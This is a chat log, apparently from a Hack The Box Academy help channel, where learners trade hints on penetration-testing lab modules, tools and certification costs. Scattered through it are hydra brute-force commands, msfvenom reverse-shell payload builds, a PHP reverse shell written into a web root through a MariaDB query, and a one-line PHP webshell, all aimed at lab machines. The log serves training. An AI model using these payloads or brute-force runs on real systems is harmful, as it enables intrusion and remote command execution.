i think the team behind the academy content creation calculate the time with the assumption that the student has minimal or zero knowledge of the subject
Well I guess I spend too much time doing rockyou brute force when I should mostly work with the resources given by htb
Thanks for your review
yea brute force with rockyou is far away from being realistic at least in Enterprise environments
Hello everyone,
Could I get a nudge with 'attacking common services: MAIL'? I've enumerated the user as per Q1 and am now working on getting the user's password. Brute forcing with hydra and the provided password list, but it's completing in seconds even though it's 333 passwords and showing '0 valid passwords' for the user. Currently running a rockyou brute as well but the pwnbox isn't quick when it comes to such large wordlists... I know I'm on the right track but I'm very confused as to why the brute is coming back without any results. hydra syntax I'm using: || 'hydra -l user -P ./pws.list 10.129.255.254 pop3' || I've also used the syntax with || pop3://10.129.255.254/ || with the same results.
Edit: NVM I got it... needed to add the domain name to the user... e.g. user@inlanefreight.htb
@violet umbra
if you are on SMTP hint use ||smtp-user-enum ||
Need some help on AD Enumeration & Attacks Skills Assessment part 2. On the very last two questions where I need to get access to DC01. I see that the port for evil-winrm is open, but nothing connects. I can evil-winrm into MS01, but can't RDP and I believe that I need to eventually RDP into DC01. Any help would be greatly appreciated
Thanks! I was already past that part though, had issues with user syntax to brute the creds, not enum the user.
hint: you don't need RDP on DC01, but you should be able to RDP into MS01 with one of the user creds you found previously for a Q
also hint: look at some of the 9 Qs, one Q hints that a user we got has a sus right over DA
if that's the case, hint: when brute forcing, for the username make sure you have the full domain name
In the "Attacking Enterprise Networks" module, "Web Enumeration & Exploitation", upon logging in to the WP instance I get a "502 Proxy Error". Has anyone had the same problem?
Edit: Solved
I have tried to RDP with all the users using xfreerdp but all I get is this error for each user
are you using the "root" user?
I did not find a "root" user...I found 4 users. Are they supposed to have "root" privileges, or are they actually named "root"?
I'm sorry, I meant are you using the "root" user on your pwnbox to issue the xfreerdp command? If yes, switch to "htb-student"
or when running xfreerdp did you use sudo?
No I am htb-student
I do not use sudo...
Still doesn't work with sudo
maybe restart the pwnbox
restarted, but same issue. If the creds were wrong it would be a different error wouldn't it?
nevermind...gave wrong password and got same error
guys, need help, i can't find the answer to this: Find and submit the contents of the TXT record as the answer. i have tried for like a week, please just give me the answer to this task
the module is Active Subdomain Enumeration
yo guys
how can i connect to the smtp server and use creds to login? i tried this so far
Trying 10.129.61.209...
Connected to 10.129.61.209.
Escape character is '^]'.
220 WIN-02 ESMTP
EHLO inlanefreight.htb
250-WIN-02
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
AUTH LOGIN PLAIN
334 UGFzc3dvcmQ6
any help
I think you're trying to rdp inside an ssh connection?
That is correct. Was that the problem? I was finally able to connect I used proxychains
Yup, you can't rdp like that.
That's why it was asking you to check the DISPLAY env variable.
lol, doubtful I will forget that tidbit again 🥲
Since it's a different machine, and you're trying to xfreerdp inside that, you need to have that machine's GUI or it won't pop the RDP.
never mind guys some googling is useful
what am i doing wrong?
```
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\pipe\SQLLocal\SQLEXPRESS01
Error getting security:
All pipe instances are busy.
No matching objects found.
PS C:\Users\htb-student\Desktop>gci \\.\pipe\
Directory: \\.\pipe\SQLLocal
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 12/31/1600 4:00 PM 3 SQLLocal\SQLEXPRESS01
```
go through the dns section of the footprinting module again
Hi, i'm new here and i'm doing the Footprinting lab. I already mounted the nfs and i entered the nfs file but it's just a bunch of tickets. am i on the wrong path?
Look carefully at the files.
thx i will
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -l fiona@inlanefreight.htb -P pws.list -f 10.129.26.242 smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-20 13:37:36
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 333 login tries (l:1/p:333), ~21 tries per task
[DATA] attacking smtp://10.129.26.242:25/
[ERROR] all children were disabled due too many connection errors
why is it too many errors?
is my syntax
bad?
your syntax is right
Hey guys, could someone give me some brief help on the ATTACKING COMMON SERVICES lab easy module? I'm trying to upload a shell.
When running the cmd=___ from the site in firefox, I am only able to run 'whoami' and 'dir' and 'more' doesn't work.
I am planning out the Penetration Tester Job Role Path.
How many hours is it? All i see on the site is "43 days"
1,032 hours
anyone know how it works?
you could brute force the password
i think 1 day is ~8 hours
@sly dome thank you. I thought so but didn't want to assume
Hello,
I'm doing PIVOTING, TUNNELING, AND PORT FORWARDING part: Meterpreter Tunneling & Port Forwarding
I created payload with command
||msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 -f elf -o backupjob2 LPORT=8081||
Started meterpreter listener and transferred file to ubuntu machine
When I run ./backupjob2 I get the error Segmentation fault (core dumped)
and on my attacker machine I have: 10.129.17.43 - Command shell session 4 closed.
Can anyone tell me what's the problem?
how did you transfer ?
always an individual perspective coz it depends on how many hours you’re dedicating to it per day
im already doing 10h/day
i don’t get your point xD
if someone is a beginner but he learns real quick new stuff and also is putting >8h/day
he will be able to finish it in a month or less
you cant measure how long a course will take
you can estimate and they did with the 43 days
but the content of the path is not extremely dense or difficult imho
its somewhat intermediate
I would rate the difficulty equal to
Ranking up iron 1,2,3 in Valorant
You never know 500 hours ? Maybe
190 hours could be
And don't forget if you know foundational knowledge. It can save so many hours
also do infosec foundations as path description advises
way better than chisel, for me it is the best pivoting tool
I don't know if it was user error or Ligolo-NG error, but with both Dante and Offshore I often saw people using Ligolo-NG and then things not working. Once they started using Chisel, it worked without problems.
So it may as well cost you a lot of extra hours.
Yes, but since it affected multiple people, I really don't know if it was the user.
I did not try that in labs but thanks for sharing it is always good to know more than 1 tool and methods
how can socks work and tcp doesn't
i can't see the logic behind it being the tool's fault
Mass Human error ?
also weird
Get the binary and try to figure out lol
I don't know why certain commands didn't work when they used ligolo ng.
do you have the references?
guys i found an ftp server
that connects to a web browser
can i use the ftp to upload a php file
Perhaps
and trigger it from visiting the web site
Why not just fuck around and find out?
Unfortunately no, this help on Offshore and also Dante often lies months back
I do not keep a record of who I helped with what and when.
I noticed an error in setting up the meterpreter listener,
I didn't select the payload.
Now it's working but sending the stage takes forever and doesn't want to finish.
now its stuck :/
Instead of asking
no problem mate, i have Dante in my route and i'll use Ligolo-ng
we will discover xD
I used ligolo for Dante... I've only made it like 60% through, but it had been working without noticeable issue for me
What exactly do you mean by full interactive?
How did you create your webshell? What exactly does this thing do?
not sure if this is the right place to ask a small question;
I'm doing a task which wants me to put the hash as an answer, I get the hash but it says "incorrect answer"?
If it's an Academy module, you're absolutely right. But you need to provide some more information
Which module?
Which section?
Which question?
What did you do, or what does not work?
Make sure there is no space at the beginning or at the end of the hash.
Linux File Transfer Methods
Linux section;
I've SSH'd into the machine which has the zip file, typed "hasher [zip file]", received the hash but still says incorrect answer
nvm, am idiot, still trying to learn HTB.
Only other question, is RDP sessions always unstable with HTB?
This Question?
Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.
Yeah, thats my bad, skipped over the "unzip" part.
the previous section where you have to RDP into the session, I cant seem to get a stable connection, I've got a VPN connection but it connects me, few seconds later the connection drops.
Same module.
Section: Windows File Transfer Methods
i used mysql
Download the VPN file again. Choose TCP
https://academy.hackthebox.com/vpn
to write a php file into the web dir
i got the shell back but only two commands are working, whoami and dir
i'm trying to upgrade the shell
For the upload of the shell?
Then it is probably a very simple webshell with which you can send exactly one command at a time. This shell never becomes fully interactive.
Will give tcp a shot, cheers for the help PayloadBunny!
MariaDB [(none)]> SELECT "<?php set_time_limit(0); $ip = '10.10.14.129'; $port = 1234; $sock = fsockopen($ip, $port); while(!feof($sock)) { $command = fgets($sock, 1024); $output = shell_exec($command); fwrite($sock, $output); } fclose($sock); ?>" INTO OUTFILE 'C:\\xampp\\htdocs\\me.php';
Query OK, 1 row affected (0.100 sec)
cant i use msfvenom
to inject another reverse shell to my machine
cuz now im confused how can i get the flag
Yes, you can try to create an exe and upload it there. But the question is, why?
You only have to read out the flag 🙂 You can do that with a PHP webshell without problems.
i cannot change the dir
You don't need to.
i need to read the flag
As I said, with the webshell you can execute exactly one command and then you are back to the original state.
this is my web shell
or try another web shell
Yes, brutally complicated, but works 🙂
With this you can send a command and are then back in the original state
For example, you can take a look at the C:\ drive.
dir c:\
If there is a flag, you can view it like this:
more c:\flag.txt
what about this error? ┌──(shadowalker㉿kali)-[~/easy]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.129 LPORT=4444 -f exe > payload.exe
Error: unloadable payload: windows/meterpreter/reverse_tcp
i'll try to do this now
still i want to learn how to upgrade the shell in windows for the first time
there is no equivalent in Windows of upgrading a tty from Linux
the most you have is conptyshell
from the one and only Antonio Cocomazzi
you can‘t upgrade a WebShell….
really
even tho, like, uploading an exe inside this session
its not a webshell right? you received it via netcat
this is not a webshell tho
TCP fixed the connection issues PayloadBunny ^^ thanks for that.
but if you have access to MariaDB you have access to the system itself
what u tryna do?
you could read the flag from MariaDB
i think you are trying to complete advanced topics for which you dont have the fundamentals yet
yes
they showed us how to write files with mysql
then we need to do this
it's the attacking common services easy lab
Yeah, then write an easy PHP Webshell and use it 😉
like this
```php
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
```
<?php system($_GET['cmd']); ?>
This script says take the GET parameter cmd and pass the value to system
instead of cmd you can enter whatever you want here.
<?php system($_GET['shadowexe13']); ?>
Then you can use it like this:
yourfile.php?shadowexe13=ls
i sent you how to read files from the MariaDB itself xD
im reading it right now
cool, use it
lool
ofc you have to know the path of the flag
yeah
easy?
xD
it makes sense now
more Google !!
And that's exactly what he needs the WebShell for in this lab 😉
The path? Yes
guessing is a nice skill for a pentester
i'm looking for the flag path
no problem dude
If I remember correctly, it is a standard path. ||User directory or Admin directory. Desktop or Documents Folder ||
that's what i'm looking inside
guys that's enough for me today, thank you, i learned something new, thanks guys for your help, my head hurts
Module INTRODUCTION TO BASH SCRIPTING, section Flow Control - Loops
should we add this to erratum?
or is that intended? i think not, because they're teaching us the ${#var} syntax
Yeah, post it, then the author looks at it and can decide for himself if he wants to change it
kk
Hey guys, got a little question, so I did a lot of boxes these 3-4 days, maybe 10. And I realize that now that I am at the 10th I forgot what i did in the 1st one. Is it normal?
(Idk if it's the right channel to ask those questions)
the ${#var} is the syntax for checking how many characters are in a variable
and it does not include the new line
Heyooo peepes
Who's in charge here of the modules for CPTS? I'd like to report a typo
If I don't write anything down, then by Box 2 I already forget exactly what I did in Box 1.... 🤪
You are always on top of everything my friend, thank you
After a certain time, you know how things work here...
That do be why bunny do the bunnying
But like you helped me hundreds of times now, how do I give you some recognition? Send you flowers? HTB respect points? Hand made cookies delivered to your house?
There's a respect button on htb
I have started with some HTB Respect points for now @acoustic owl
Done 🔥
👌
So you do a write-up for each box?
It scared me a little, because i tell myself if I forget, it's like i solved it for nothing
you and me both said the same bro !
Hey, can you use your own vm to connect to htb academy targets?
I don't see any vpn file to download and it seems like you have to use the pwnbox.
Yes, I take notes on how to get which problem solved.
the answer should be 34070 (actual number of string’s characters) and it’s at this moment 34071
you should read the comments i added to my screenshot before commenting!!
You can use your own vm
Just download your VPN File here
https://academy.hackthebox.com/vpn
omg thank you so much, you're a champion ❤️
And broo, second question: I began cybersec at 23 years old, is it late? (Some people will say you are crazy, 23 yo is young, but some people begin at 13, so …). And if you have any advice for me too
It's never too late to learn something new.
It's too late when the spoons kill you
You have a spoon trauma
Anyone want to work on MODERN WEB EXPLOITATION TECHNIQUES - Final Skills Assessment?
I got the first flag easily, but I'm stuck on the rest
Have you tried harder?
When you have found the first flag, you should also be able to answer question two
With this, you should easily find a way to answer question three
I would assume so, but the password wasn't in "there". Don't want to ruin anything for the rest of people, so I won't say what "there" is, but let me tell you I poked around and couldn't find anything except for the flag
Tier 3
Tier III
if you need help with q2, send me a dm.
Best vpn quality price ?
is there anyone who did the ad skills lab part 2 that can help me?
HAHAHA this is just 2 good
Vim is best
Module: Blind SQL Injection
For some reason I'm getting this error. Can't interact with mssql
mssqlclient.py thomas:'TopSecretPassword23!'@10.129.80.96 -db bsqlintro
Anyone know the fix?
I like dbeaver
for the first exercises?
Have you tried with sqsh?
sqsh -S 10.129.80.96 -U thomas -P 'TopSecretPassword23!' -h
Dbeaver is life
If they're using parrot, sqsh has issues
Hi folks 👋 , I'm doing the "AD Administration: Guided Lab Part I" lab in the Academy. I'm trying to connect to the Windows machine from the HTB Parrot workstation:
$ xfreerdp /v:IP /u:USER /p:PASS
[07:41:09:641] [4505:4506] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[07:41:09:641] [4505:4506] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[07:41:10:944] [4505:4506] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[07:41:10:944] [4505:4506] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[07:41:10:959] [4505:4506] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[07:41:10:960] [4505:4506] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
The xfreerdp window opens, but the screen remains black. I tried resetting the target machine a few times. I also tried connecting using my Kali VM over the HTB VPN, but the result is the same. Any idea how to troubleshoot this?
Try to press "Enter"
Thanks, that was it! 😅
hello, i need help on Module Windows Privilege Escalation: Vulnerable Services
I have tried to reverse shell but it does not work for me, I also tried to add htb-student to the administrators group but I still can't access any file, what i am missing?
once you have added the "htb-student" to the administrator group did you open the prompt as admin?
yup but it requires the admin password
someone told me to restart windows but idk how on rdp
I'm confused you added a user to the administrator group right?
Why do you need the admin password and not the one for the current user you have added (if you did set a password)
yes i finished adding my current user to the administrator group but it seems like I need to restart to make it work, but idk how to restart windows over rdp
no you don't need to do so
hi, i have a problem in the broken authentication module / brute forcing usernames / second assessment
i tried many things but i can't reach the solution
thanks bro, as you said i don't need to restart, my machine was broken, I just restarted the machine and now it works... thanks again
i tried brute forcing with hydra and zap and i watched the responses and i didn't get anything
Any info on when the HTB backend issue will be solved? Been stuck on the Active Directory Enumeration & Attacks module for a while now cause RDPing is next to impossible unless you get in by chance. Otherwise connection fails right after the password
reach out to support to make them aware of any issues you are having
Hello everyone, i'm looking for a text editor that runs in command prompt or powershell and is native to windows, like nano in linux. does somebody know something?
vim (not native though)
if its not alot of work maybe just echo
i have a script and i want to edit it, i don't have a gui
what situation are you in
if you have connection to your attack host maybe you could edit the file from local and transfer it back?
this would be a good idea, but how can i set up an http server for the transfer in powershell?
Ok, thanks
np
Hi 👋 anyone can point me in the right direction on Predictable Reset Token Q1... I'm getting the time from the web app after triggering via the script a new token, the value is parsed like ||time.mktime(time.strptime(timestamp,'%Y-%m-%d %I:%M:%S%p'))*1000|| the token is generated like ||user+str(time_value)|| and hashed with md5, all this in the range of epoch +-1001
At this point i'm not even sure if I spelt htbadmin correctly 😂
Module: Attacking Enterprise Networks
Chapter: Web Enumeration & Exploitation
Question: Register an account and log in to the Gitlab instance. Submit the flag value (flag format : HTB{}).
Issue: whenever I try to register it gives me an error telling me that an administrator needs to approve my request, and when I explore the public repository I can't see any projects in it. not sure what I'm doing wrong.
Fix: worked after restarting the box, which I find very weird
Guys what do you recommend me to do after the « starting point ».
it is a good practice to take the fundamental modules 1 by 1
as even if you might know some of them they still offer some good POV and examples coming from real pentesters
hey @viscid wave were you able to do those without hint and walkthroughs?
if you are asking about main platform then this isn't the right place, read #welcome and #rules after that use /verify at #bot-commands to get access to HTB main platform channels
For the first question of the MSSQL section in the Footprinting module I don't know why I keep getting this error every time I type out this command:
https://academy.hackthebox.com/module/112/section/1246
"sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248"
Hey guys
I still get the same error when I follow the suggested command in the erratum room
I see. what pwnbox do I use if the default is 7.93
how do I downgrade to 7.92
dude
use a bit of Google or search in this chat
you are training to be a pentester you have to develop this skill
of finding out stuff by yourself
thanks @fathom pendant
Pretty neat
All I did was type
from:@rafaaaaa98 7.92 since he said he posted a solution
Crazy how simple and easy search features are
i have to ask myself how people are reaching advanced modules like the mssql one
“advanced” you know
How do you know that I didn't google after I asked that question in discord? You don't
And then I 'googled'. That's what I do
nice job then
its a little annoying when people ask without trying
It's fairly reasonable given the track record of people that ask those types of questions
i'm doing the section Internal Password Spraying - from Linux
i logged in and i don't see a text file called valid_users.txt to do password spraying
was i supposed to create the text file?
I guess so
Valid_users.txt would be the file you create... to uh... you know keep track of valid users...
Without walkthrough but not without hint
This really isn't the place for that conversation lol
Should probably verify your htb account with discord after reading #welcome
I am doing it sorry
Then try going with the easy machines while covering the htb academy modules
Module: ATTACKING COMMON APPLICATIONS
Chapter: Exploiting Web Vulnerabilities in Thick-Client Applications
Question: What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
Issue: after modifying the port from 8080 to 1337, removing the hashes from META-INF/MANIFEST.MF and deleting the 1.RSA and 1.SF files from the META-INF directory, I can't see the open button at the bottom of the program. any idea what I'm missing?
Is any new advanced web certificate coming soon from HTB?
All these recent Modules related to Websec kind of give hint about that
So far nothing like this has been announced, but I also expect that such a path could be announced in the coming months
Yeah it would be cool we get one
Have you done CBBH yet? Maybe as a warm-up?
Hello everyone, I want to learn topics like the HTB challenges (forensics, web, crypto, reversing...) but I have no idea where to start. Does anybody know of any academy or something where I can start learning these topics? Thanks all!
if you have experience with offsec, OSWE is not that much harder than OSCP
ok so
I'm doing the very first tutorial in Hack The Box and I get an issue on the second and third part
Error opening local file worknotes.txt
smb: \Amy.J>
smb: \Amy.J> get worknotes.txt
Error opening local file worknotes.txt
smb: \Amy.J>
I couldn't write in pwnbox
If you do not have access to #710108839063846964 read and follow #welcome
i have access
I just couldn't get the file, with smb or ftp
so I thought I'd mention that
worked fine to ftp, smb into the IPs
I was gonna but then I assumed there will be an advanced Web cert so I saved the money for that. I am on my way for CPTS, 85% done with the pathway.
I will need a really good day to afford those certificates. For now it is out of budget
Nothing has been announced yet. But it's certainly not a bad idea to complete the modules. If an exam is then announced, you can be one of the first to take the exam.
Yeah I planned on using the CBBH money for a subscription to complete these advanced modules.
That's what you are hunting, n1 spot on a new cert
😄
The new modules are Tier III and cost at least 500 cubes. The path will therefore be massively more expensive
- Modern Web Exploitation Techniques (500 Cubes)
- Secure Coding 101: JavaScript (1000 Cubes)
- Whitebox Pentesting 101: Command Injection (500 Cubes)
- Introduction to Deserialization Attacks ( 500 Cubes)
- Attacking Authentication Mechanisms ( 500 Cubes)
- Introduction to NoSQL Injection ( 500 Cubes)
- Blind SQL Injection ( 500 Cubes)
- HTTPs/TLS Attacks ( 500 Cubes)
- Advanced SQL Injections ( 500 Cubes)
- Abusing HTTP Misconfigurations ( 500 Cubes)
- HTTP Attacks (500 Cubes)
- Injection Attacks (500 Cubes)
- Whitebox Attacks (500 Cubes)
- Application Logic Flows (not published yet)
I’m saving up cubes already
Are you preparing to insta-start the exam?
I need a lot more practice.
But yes, actually I would like to take the exam soon.
I was one of the first at the CBBH, also at the CPTS and who knows, maybe also at the CDSA
Think you just passed CPTS when I started my path :D. 8 months later I'm still no CPTS, I'm planning to take it on Monday, one last hurrah before starting a new job
Good luck 🍀
I owe HTB everything for making such an advanced course. I was able to learn everything systematically through CBBH and CPTS for other more expensive courses 😄 so I only needed to do the exam :p
That's cool
I was not having a structure of learning until academy came and it saved me from wasting my time on things that were not helpful but rather kept me busy
I hope price point is same for next certificates
Having some issues with the Metasploit module.
On the one called Modules > choosing the exploit > setting the RHOSTS but I get stuck with "Exploit completed, but no session was created." Am I missing something obvious?
HAHAH what the heck is this path?
7000 cubes
not that much tho
Cbbh promax
also taking into account you get cubes back
500 is actually 400 and 1000 is actually 800
iirc
it's 5600 cubes
not that expensive if we compare it with OSWE XD!!!
If we go that way everything is so cheap and good 😂😂
I would be happy putting my money on HTB
Gold annual / Platinum annual
Rather than Offsec
but OSCE3 is king
Finding job could be hard but let's see
and OSEE is a one-of-a-kind cert xD
every1 in this community hopes HTB certs get more appreciation
if you have time and energy you can get Learn Unlimited for a year, it's 5000, but you can do all offsec certs and unlimited repeats 😄 for a year
true
OSEE is a fkn dream l0l
I mean they may very well use that as an argument for increased prices for a more advanced course
though ngl, I kinda wish they just had a more straightforward exam bundle for their courses.
just a flat "These modules needed are unlocked, here's a voucher, go"
then if they did a more advanced course they could discount it a bit to a more reasonable price if you got the exam bundle
hello guys 🙂 I found out about hackthebox like a month ago and just started rn, is there like a way to get more time in the linux thing?
paying
any other
....
no